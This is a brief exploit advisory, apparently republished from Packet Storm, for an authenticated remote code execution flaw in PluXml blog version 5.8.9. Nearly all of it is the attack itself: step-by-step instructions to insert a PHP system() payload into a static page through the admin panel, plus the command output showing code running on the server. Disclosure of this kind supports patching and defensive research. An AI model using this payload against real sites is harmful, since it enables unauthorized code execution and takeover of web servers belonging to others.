PluXml Blog 5.8.9 Remote Code Execution

PluXml Blog 5.8.9 Remote Code Execution
2024-1-8 23:2:54 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)
### Date: 2024-1-7
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://pluxml.org/
### Version : 5.8.9
### Tested on: https://www.softaculous.com/apps/cms/PluXml1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001
    Payload : <?php echo system('id'); ?>
2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1
    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

文章来源: https://packetstormsecurity.com/files/176407/pluxmlblog589-exec.txt
如有侵权请联系:admin#unsafe.sh